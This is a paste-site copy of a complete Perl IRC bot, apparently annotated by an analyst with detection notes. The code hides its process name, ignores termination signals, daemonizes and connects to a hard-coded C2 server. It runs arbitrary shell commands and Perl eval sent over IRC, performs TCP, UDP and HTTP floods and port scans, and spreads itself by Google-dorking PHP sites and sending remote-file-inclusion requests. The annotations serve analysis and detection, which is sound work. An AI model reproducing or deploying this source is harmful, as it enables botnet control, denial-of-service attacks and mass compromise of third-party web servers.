Bot

From Unknown, 3 Years ago, written in Perl, viewed 1'198 times.
URL http://paste.security-portal.cz/view/a582d4e7 Embed
  1. #!/usr/bin/perl
  # Analyst note: configuration and start-up of an IRC-controlled bot.
  # Host-side traits visible in this block: the process title is overwritten
  # with the value of $processo, the working directory is changed to /tmp,
  # INT/HUP/TERM/CHLD are ignored, and the script forks and lets the parent exit.
  # Network-side traits: an outbound TCP connection to $servidor:$porta and a
  # JOIN of the channels in @canais (both used further down in the listing).
  2. my $processo =("WATCHD0G");   # string later written into $0 and grepped for in `ps`
  3.  
  4. my @titi = ("index.php?page=","main.php?page=");   # URL fragments used by fetch() and the "google" command
  5.  
  6. my $goni = $titi[rand scalar @titi];   # one fragment chosen at random at start-up
  7.  
  8. my $linas_max='3';   # shell(): number of output lines sent before pausing
  9. my $sleep='7';       # shell(): pause length in seconds
  10. my @adms=("Admin" );          # nicks that parse() accepts commands from
  11. my @hostauth=("fbi.gov");     # hostnames that parse() accepts commands from
  12. my @canais=("#vfs");          # channels joined after the server's 001 welcome
  13. #my $procs=`ps -ef | grep -v grep | grep $processo | grep -c .`;
  14. #if( $procs > 0 ) {
  15. #    die "ERR $procs";
  16. #}
  17.  
  18. chop (my $nick = `uname`);   # IRC nick = output of `uname` with its last character removed
  19. my $ircname =("k");
  20. my $realname = ("z");
  21. my $servidor='xzvf.ungabriel.cu.cc';   # default IRC server; overridden by $ARGV[0] below
  22. my $porta='8080';
  23. my $VERSAO = '0.5';
  24. $SIG{'INT'} = 'IGNORE';
  25. $SIG{'HUP'} = 'IGNORE';
  26. $SIG{'TERM'} = 'IGNORE';   # a plain `kill` (SIGTERM) is ignored by this process
  27. $SIG{'CHLD'} = 'IGNORE';
  28. $SIG{'PS'} = 'IGNORE';     # NOTE(review): 'PS' does not look like a standard signal name - confirm
  29. use IO::Socket;
  30. use Socket;
  31. use IO::Select;
  32. chdir("/tmp");
  33. $servidor="$ARGV[0]" if $ARGV[0];
  34. $0="$processo"."\0"x16;;   # overwrites the process name reported by the OS with $processo plus NUL padding
  35. my $procs=`ps -ef | grep -v grep | grep $processo | grep -c .`;   # counts ps lines containing the title
  36. if( $procs > 1 ) {   # presumably 1 is this process itself; more than one means another copy is running
  37.     die "ERR $procs";
  38. }
  39.  
  40. my $pid=fork;
  41. exit if $pid;   # parent exits, the child carries on in the background
  42. die "Problema com o fork: $!" unless defined($pid);
  43.  
  44. our %irc_servers;   # per-connection state, keyed by the socket (filled in conectar)
  45. our %DCC;           # not referenced again in the visible listing
  46. my $dcc_sel = new IO::Select->new();   # not referenced again in the visible listing
  47.  
  48. $sel_cliente = IO::Select->new();   # select set polled by the main loop
  # sendraw: write one newline-terminated line to an IRC socket.
  # With two arguments (socket, text) the text goes to that socket; with any
  # other argument count $_[0] is written to the global $IRC_cur_socket.
  49. sub sendraw {
  50.   if ($#_ == '1') {   # $#_ is the last index of @_, so 1 means two arguments
  51.     my $socket = $_[0];
  52.     print $socket "$_[1]\n";
  53.   } else {
  54.       print $IRC_cur_socket "$_[0]\n";
  55.   }
  56. }
  57.  
  # conectar(nick, server, port): open a TCP connection to an IRC server and register.
  # Returns 1 when the connection cannot be opened. On success the socket becomes
  # the global current socket, is added to $sel_cliente, its host/port/nick/local
  # address are recorded in %irc_servers, and NICK and USER are sent.
  58. sub conectar {
  59.    my $meunick = $_[0];
  60.    my $servidor_con = $_[1];
  61.    my $porta_con = $_[2];
  62.  
  63.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  64.    if (defined($IRC_socket)) {
  65.      $IRC_cur_socket = $IRC_socket;
  66.  
  67.      $IRC_socket->autoflush(1);
  68.      $sel_cliente->add($IRC_socket);
  69.  
  70.      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  71.      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  72.      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  73.      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;   # local address of the connection
  74.      nick("$meunick");
  75.      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");   # USER line carries the host's own local address
  76.      sleep 1;
  77.    }
  78. }
  # Main loop: keep at least one IRC connection open, read whatever is available
  # on the connected sockets, split it into lines and hand each complete line to
  # parse(). An incomplete trailing line is kept in $line_temp and prepended to
  # the next line processed.
  # Analyst note: can_read(0) is a zero-timeout poll and the loop has no sleep,
  # so the process spins while idle; sustained CPU use may be a host-side symptom.
  79. my $line_temp;
  80. while( 1 ) {
  81.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }   # retries until a server entry exists
  82.    delete($irc_servers{''}) if (defined($irc_servers{''}));
  83.    my @ready = $sel_cliente->can_read(0);
  84.    next unless(@ready);
  85.    foreach $fh (@ready) {
  86.      $IRC_cur_socket = $fh;
  87.      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  88.      $nread = sysread($fh, $msg, 4096);
  89.      if ($nread == 0) {   # zero bytes read: drop the socket and its state
  90.         $sel_cliente->remove($fh);
  91.         $fh->close;
  92.         delete($irc_servers{$fh});
  93.      }
  94.      @lines = split (/\n/, $msg);
  95.  
  96.      for(my $c=0; $c<= $#lines; $c++) {
  97.        $line = $lines[$c];
  98.        $line=$line_temp.$line if ($line_temp);
  99.        $line_temp='';
  100.        $line =~ s/\r$//;
  101.        unless ($c == $#lines) {
  102.          parse("$line");
  103.        } else {
  # Last line of this read: parsed when it is the only line, when it ended in
  # "\r", or when it is a NOTICE AUTH line; otherwise buffered as a fragment.
  104.            if ($#lines == 0) {
  105.              parse("$line");
  106.            } elsif ($lines[$c] =~ /\r$/) {
  107.                parse("$line");
  108.            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  109.                parse("$line");
  110.            } else {
  111.                $line_temp = $line;
  112.            }
  113.        }
  114.       }
  115.    }
  116. }
  117.  
  # parse(line): handle one line received from the IRC server.
  #   PING            -> answers with PONG.
  #   PRIVMSG         -> answers a CTCP VERSION request with a fixed mIRC version
  #                      string, then applies the operator check and dispatches
  #                      commands (see below).
  #   NICK            -> tracks a change of the bot's own nick.
  #   numeric 433     -> retries with the nick plus "|" and a random number.
  #   numeric 001     -> stores nick and server name, joins every channel in
  #                      @canais with the key "ddosit".
  # Operator check: the sender's host must equal an entry of @hostauth and the
  # sender's nick an entry of @adms (both compared case-insensitively).
  # Analyst note: the fixed VERSION reply, the channel key and the nick derived
  # from `uname` are values a network sensor on IRC traffic could match on.
  118. sub parse {
  119.    my $servarg = shift;
  120.    if ($servarg =~ /^PING \:(.*)/) {
  121.      sendraw("PONG :$1");
  122.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  123.        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;   # sender nick, sender host, target, message text
  124.        if ($args =~ /^\001VERSION\001$/) {
  125.          notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");   # presents itself as an mIRC client
  126.        }
  127.        if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
  128.        if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
  129.          if ($onde eq "$meunick"){
  130.            shell("$pn", "$args");   # private message to the bot: the whole text goes to shell()
  131.          }
  132.          if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {   # message addressed by nick or prefixed with "!say"
  133.             my $natrix = $1;
  134.             my $arg = $2;
  135.             if ($arg =~ /^\!(.*)/) {
  136.               ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);   # "!" prefix: IRC control commands
  137.             } elsif ($arg =~ /^\@(.*)/) {
  138.                 $ondep = $onde;
  139.                 $ondep = $pn if $onde eq $meunick;   # reply to the sender when the message was private
  140.                 bfunc("$ondep","$1");   # "@" prefix: built-in functions
  141.             } else {
  142.                 shell("$onde", "$arg");   # anything else: passed to shell()
  143.             }
  144.          }
  145.        }
  146.         }
  147.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  148.        if (lc($1) eq lc($meunick)) {
  149.          $meunick=$4;
  150.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  151.        }
  152.    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  153.        nick("$meunick|".int rand(999999));
  154.    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  155.        $meunick = $2;
  156.        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  157.        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  158.        foreach my $canal (@canais) {
  159.          sendraw("JOIN $canal ddosit");
  160.        }
  161.    }
  162. }
  163.  
  164.  
  # bfunc(reply_target, command): run one built-in function in a detached process.
  # The sub forks twice: the first child exits at once (the parent reaps it with
  # waitpid) and the grandchild does the work and then exits, so the main loop
  # keeps servicing IRC while a function runs. Status text is sent to
  # reply_target as PRIVMSG lines tagged [SCAN], [TCP], [VERSION], [GOOGLE],
  # [HTTP] or [UDP].
  # Analyst note: those tags and the fixed status phrases are stable strings in
  # the bot's IRC traffic; the traffic each branch produces is described inline.
  165. sub bfunc {
  166.   my $printl = $_[0];
  167.   my $funcarg = $_[1];
  168.   if (my $pid = fork) {
  169.      waitpid($pid, 0);
  170.   } else {
  171.       if (fork) {
  172.          exit;
  173.        } else {
  174.            if ($funcarg =~ /^portscan (.*)/) {   # TCP connect attempts against a fixed port list, 4 s timeout each
  175.              my $hostip="$1";
  176.              my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
  177.              my (@aberta, %porta_banner);
  178.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");    
  179.              foreach my $porta (@portas)  {
  180.                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
  181.                 if ($scansock) {
  182.                    push (@aberta, $porta);
  183.                    $scansock->close;
  184.                 }
  185.              }
  186.  
  187.              if (@aberta) {
  188.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
  189.              } else {
  190.                sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
  191.              }
  192.            }
  193.            if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {   # host, port, seconds: calls tcpflooder() until the time is up
  194.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
  195.              my $itime = time;
  196.              my ($cur_time);
  197.              $cur_time = time - $itime;
  198.              while ($3>$cur_time){
  199.              $cur_time = time - $itime;
  200.              &tcpflooder("$1","$2","$3");
  201.              }
  202.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
  203.            }
  204.            if ($funcarg =~ /^version/) {
  205.                 sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);               
  206.                 }
  # "google" branch: for the given number of seconds, takes URLs returned by
  # fetch(), keeps each URL's directory part and requests
  # <dir>/<$goni><second argument> through http_query(). The counter is
  # incremented for every request; the response in $page is not inspected.
  # Analyst note: on the receiving web server this shows up as GET requests for
  # index.php or main.php whose "page" parameter carries an operator-supplied
  # value (presumably a remote URL - confirm), a pattern to look for in access logs.
  207.            if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
  208.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
  209.              srand;
  210.              my $itime = time;
  211.              my ($cur_time);
  212.              my ($exploited);
  213.              $boturl=$2;
  214.              $cur_time = time - $itime;$exploited = 0;
  215.                 while($1>$cur_time){
  216.                     $cur_time = time - $itime;
  217.                     @urls=fetch();
  218.                         foreach $url (@urls) {
  219.                         $cur_time = time - $itime;
  220.                         my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
  221.  
  222.                         $url =$path."/$goni$boturl" ;
  223.  
  224.  
  225.  
  226.  
  227.                         $page = http_query($url);
  228.                         $exploited = $exploited + 1;
  229.                     }
  230.                 }
  231.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
  232.            }
  233.            if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {   # host, seconds: repeated "GET /" on port 80, one connection per request
  234.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
  235.              my $itime = time;
  236.              my ($cur_time);
  237.              $cur_time = time - $itime;
  238.              while ($2>$cur_time){
  239.              $cur_time = time - $itime;
  240.              my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
  241.              print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";   # request carries no User-Agent header
  242.              close($socket);
  243.              }
  244.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
  245.            }
  246.            if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {   # host, payload size, seconds: delegates to udpflooder()
  247.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
  248.              my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
  249.              $dtime = 1 if $dtime == 0;
  250.              my %bytes;
  251.              $bytes{igmp} = $2 * $pacotes{igmp};
  252.              $bytes{icmp} = $2 * $pacotes{icmp};
  253.              $bytes{o} = $2 * $pacotes{o};
  254.              $bytes{udp} = $2 * $pacotes{udp};
  255.              $bytes{tcp} = $2 * $pacotes{tcp};
  256.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");   # the tcp counter is not part of the reported total
  257.            }
  258.            exit;
  259.        }
  260.   }
  261. }
  262.  
  # ircase(sender, reply_target, command): IRC-level control commands, reached
  # from parse() for "!"-prefixed text from an accepted operator. Each `if` is
  # tested independently; the handlers call the small IRC helper subs
  # (j, p, op, deop, msg, ctcp, nick, conectar, sendraw).
  # Analyst note: the last two handlers matter most for impact assessment -
  # "raw" sends arbitrary operator text to the IRC server, and "eval" runs
  # operator-supplied text as Perl inside the bot process.
  263. sub ircase {
  264.   my ($kem, $printl, $case) = @_;
  265.  
  266.   if ($case =~ /^join (.*)/) {
  267.      j("$1");
  268.    }
  269.  
  270. if ($case =~ /^refresh (.*)/) {
  271. my $goni = $titi[rand scalar @titi];   # `my` declares a new variable scoped to this block
  272.  }
  273.  
  274.    if ($case =~ /^part (.*)/) {
  275.       p("$1");
  276.    }
  277.    if ($case =~ /^rejoin\s+(.*)/) {
  278.       my $chan = $1;
  279.       if ($chan =~ /^(\d+) (.*)/) {   # optional leading count: part and join that many times
  280.         for (my $ca = 1; $ca <= $1; $ca++ ) {
  281.           p("$2");
  282.           j("$2");
  283.         }
  284.       } else {
  285.           p("$chan");
  286.           j("$chan");
  287.       }
  288.    }
  289.    if ($case =~ /^op/) {
  290.       op("$printl", "$kem") if $case eq "op";   # bare "op": give operator status to the sender
  291.       my $oarg = substr($case, 3);
  292.       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  293.    }
  294.    if ($case =~ /^deop/) {
  295.       deop("$printl", "$kem") if $case eq "deop";
  296.       my $oarg = substr($case, 5);
  297.       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  298.    }
  299.    if ($case =~ /^msg\s+(\S+) (.*)/) {
  300.       msg("$1", "$2");
  301.    }
  302.    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {   # sends the same PRIVMSG the given number of times
  303.       for (my $cf = 1; $cf <= $1; $cf++) {
  304.         msg("$2", "$3");
  305.       }
  306.    }
  307.    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
  308.       ctcp("$1", "$2");
  309.    }
  310.    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  311.       for (my $cf = 1; $cf <= $1; $cf++) {
  312.         ctcp("$2", "$3");
  313.       }
  314.    }
  315.    if ($case =~ /^nick (.*)/) {
  316.       nick("$1");
  317.    }
  318.    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
  319.        conectar("$2", "$1", 6667);   # additional server connection, port fixed at 6667
  320.    }
  321.    if ($case =~ /^raw (.*)/) {
  322.       sendraw("$1");
  323.    }
  324.    if ($case =~ /^eval (.*)/) {
  325.      eval "$1";   # string eval of text received over IRC
  326.    }
  327. }
  328.  
  # shell(reply_target, command): run a command line received over IRC and send
  # its output back as PRIVMSG lines. Uses the same double fork as bfunc, so the
  # command runs in a detached grandchild. After every $linas_max lines the sub
  # sleeps $sleep seconds before sending more.
  # Analyst note: this is arbitrary command execution with the privileges of the
  # bot process. Host telemetry would show shell children of a process titled
  # with $processo, started with /tmp as working directory.
  329. sub shell {
  330.   my $printl=$_[0];
  331.   my $comando=$_[1];
  332.   if ($pid = fork) {
  333.      waitpid($pid, 0);
  334.   } else {
  335.       if (fork) {
  336.          exit;
  337.        } else {
  338.            my @resp=`$comando 2>&1 3>&1`;   # backticks hand the string to the shell; stderr is merged into the captured output
  339.            my $c=0;
  340.            foreach my $linha (@resp) {
  341.              $c++;
  342.              chop $linha;   # removes the last character of each output line
  343.              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  344.              if ($c == "$linas_max") {
  345.                $c=0;
  346.                sleep $sleep;
  347.              }
  348.            }
  349.            exit;
  350.        }
  351.   }
  352. }
  353.  
  # tcpflooder(host, port, seconds): one round of TCP connection attempts.
  # First loop: creates up to 1000 stream sockets under the symbolic handle names
  # SOCK0, SOCK1, ... and calls connect() on each. Second loop: shutdown() on the
  # same handles. Both loops stop early once the elapsed time reaches the third
  # argument. The caller in bfunc repeats the round until its own timer expires.
  # Analyst note: on the target side this is a burst of full TCP connects from
  # one source with no application data; on the bot host it is a spike in open
  # sockets owned by one process.
  354. sub tcpflooder {
  355.  my $itime = time;
  356.  my ($cur_time);
  357.  my ($ia,$pa,$proto,$j,$l,$t);
  358.  $ia=inet_aton($_[0]);
  359.  $pa=sockaddr_in($_[1],$ia);
  360.  $ftime=$_[2];
  361.  $proto=getprotobyname('tcp');
  362.  $j=0;$l=0;   # $j counts successful connects, $l is the socket index
  363.  $cur_time = time - $itime;
  364.  while ($l<1000){
  365.   $cur_time = time - $itime;
  366.   last if $cur_time >= $ftime;
  367.   $t="SOCK$l";
  368.   socket($t,PF_INET,SOCK_STREAM,$proto);
  369.   connect($t,$pa)||$j--;
  370.   $j++;$l++;
  371.  }
  372.  $l=0;
  373.  while ($l<1000){
  374.   $cur_time = time - $itime;
  375.   last if $cur_time >= $ftime;
  376.   $t="SOCK$l";
  377.   shutdown($t,2);
  378.   $l++;
  379.  }
  380. }
  381.  
  # udpflooder(host, size, seconds): send a payload of `size` "A" characters to
  # ports 1..65000 of the host, repeatedly, until `seconds` have elapsed.
  # Four sockets are opened with protocol numbers 2, 17, 1 and 6 (counted below
  # as igmp, udp, icmp and tcp); the inner loop additionally opens a raw socket
  # for each protocol number 3..255 except 6. Returns undef when all four initial
  # socket() calls fail, otherwise the elapsed seconds followed by the
  # per-protocol packet counters.
  # Analyst note: raw sockets normally need elevated privileges, so on an
  # unprivileged account presumably only the datagram socket is usable - confirm.
  # A flow monitor sees same-size packets with a constant "A" payload sweeping
  # destination ports in ascending order.
  382. sub udpflooder {
  383.   my $iaddr = inet_aton($_[0]);
  384.   my $msg = 'A' x $_[1];
  385.   my $ftime = $_[2];
  386.   my $cp = 0;   # number of failed socket() calls
  387.   my (%pacotes);
  388.   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  389.  
  390.   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  391.   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  392.   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  393.   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  394.   return(undef) if $cp == 4;
  395.   my $itime = time;
  396.   my ($cur_time);
  397.   while ( 1 ) {
  398.      for (my $porta = 1; $porta <= 65000; $porta++) {
  399.        $cur_time = time - $itime;
  400.        last if $cur_time >= $ftime;
  401.        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;   # counters only advance when send() succeeds
  402.        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
  403.        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
  404.        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
  405.  
  406.        for (my $pc = 3; $pc <= 255;$pc++) {
  407.          next if $pc == 6;
  408.          $cur_time = time - $itime;
  409.          last if $cur_time >= $ftime;
  410.          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  411.          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
  412.        }
  413.      }
  414.      last if $cur_time >= $ftime;
  415.   }
  416.   return($cur_time, %pacotes);
  417. }
  418.  
  # Thin IRC helpers. Each builds one protocol line and passes it to sendraw()
  # with a single argument, so the line goes out on the global $IRC_cur_socket.
  # Most of them return without sending when called with the wrong number of
  # arguments; part() and quit() have no such check.
  419. sub ctcp {   # (target, text): PRIVMSG with the text wrapped in \001 markers
  420.    return unless $#_ == 1;
  421.    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  422. }
  423. sub msg {   # (target, text)
  424.    return unless $#_ == 1;
  425.    sendraw("PRIVMSG $_[0] :$_[1]");
  426. }  
  427. sub notice {   # (target, text)
  428.    return unless $#_ == 1;
  429.    sendraw("NOTICE $_[0] :$_[1]");
  430. }
  431. sub op {   # (channel, nick): MODE +o
  432.    return unless $#_ == 1;
  433.    sendraw("MODE $_[0] +o $_[1]");
  434. }
  435. sub deop {   # (channel, nick): MODE -o
  436.    return unless $#_ == 1;
  437.    sendraw("MODE $_[0] -o $_[1]");
  438. }
  439. sub j { &join(@_); }   # the & sigil calls the user-defined sub below rather than Perl's builtin join
  440. sub join {   # (channel)
  441.    return unless $#_ == 0;
  442.    sendraw("JOIN $_[0]");
  443. }
  444. sub p { part(@_); }
  445. sub part {   # (channel)
  446.   sendraw("PART $_[0]");
  447. }
  448. sub nick {   # (new nick)
  449.   return unless $#_ == 0;
  450.   sendraw("NICK $_[0]");
  451. }
  452. sub quit {   # (quit message)
  453.   sendraw("QUIT :$_[0]");
  454. }
  455.  
  456. # Spreader
  457. # this 'spreader' code isnot mine, i dont know who coded it.
  458. # update: well, i just fix0red this shit a bit.
  459. #
  460.  
  # fetch(): build one search-engine query and return the host/path strings
  # found in the result page.
  # The query is "allinurl:" followed by a randomly chosen entry of @dominios,
  # a slash and the file-level $goni fragment; the result count ($n) is 80 or 160
  # and the start offset ($s) a random multiple of it. The page is retrieved with
  # http_query() and every link matching the `<a class=l href=http://...>`
  # pattern is returned, except links containing "google", "cache" or
  # "translate". Returns a list that is empty when nothing matched.
  # Analyst note: the outbound request goes to www.google.com over plain HTTP on
  # port 80 with an "allinurl:%22<tld>/<fragment>%22" query string, which is
  # distinctive in proxy or egress logs from a server.
  461. sub fetch(){
  462.     my $rnd=(int(rand(9999)));
  463.     my $n= 80;
  464.     if ($rnd<5000) { $n<<=1;}   # roughly half of the calls ask for 160 results
  465.     my $s= (int(rand(5)) * $n);
  466.  
  467. my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
  468.                 "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
  469.                 "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
  470.                 "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
  471.                 "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
  472.                 "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
  473.                 "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
  474.                 "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",         
  475.                 "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
  476.                 "vu","vn","ye","yu","cd","zm","zw","");
  477. my @str;
  478.  
  479. foreach $dom  (@dominios)
  480. {
  481.         push (@str,"allinurl:%22".$dom."/".$goni."%22");
  482. }
  483.  
  484.     my $query="www.google.com/search?q=";
  485.     $query.=$str[(rand(scalar(@str)))];
  486.     $query.="&num=$n&start=$s";
  487.  
  488.  
  489.     my @lst=();
  490.     my $page = http_query($query);
  491.     while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
  492.         if ($1 !~ m/google|cache|translate/){
  493.             push (@lst,$1);
  494.         }
  495.     }
  496.     return (@lst);
  497. }
  498.  
  499.  
  # http_query(url): minimal HTTP/1.0 GET over a plain TCP socket to port 80.
  # The argument is a URL without scheme ("host/path?query"). The host is the
  # leading run of letters, digits, dots and hyphens before the first slash; the
  # request path is the URL with the host text removed, or "/" when nothing
  # remains. The exchange runs inside eval with a 10-second alarm. Returns the
  # response lines (headers included) joined into one string, or "" when nothing
  # was read.
  # Analyst note: every request from this sub is HTTP/1.0 with exactly the
  # headers Host, "Accept: */*" and "User-Agent: Mozilla/5.0", a combination
  # that can be matched in web-server or proxy logs.
  500. sub http_query($){
  501.     my ($url) = @_;
  502.     my $host=$url;
  503.     my $query=$url;
  504.  
  505.     my $page="";
  506.     $host =~ s/href=\"?http:\/\///;
  507.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  508.     $query =~s/$host//;   # $host is interpolated into the pattern as-is
  509.     if ($query eq "") {$query="/";};
  510.     eval {
  511.         local $SIG{ALRM} = sub { die "1";};   # the alarm aborts the eval block
  512.         alarm 10;
  513.         my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  514.         print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  515.         my @r = <$sock>;   # reads until the server closes the connection
  516.         $page="@r";
  517.         alarm 0;
  518.         close($sock);
  519.     };    
  520.     return $page;
  521.  
  522. }
  523.  
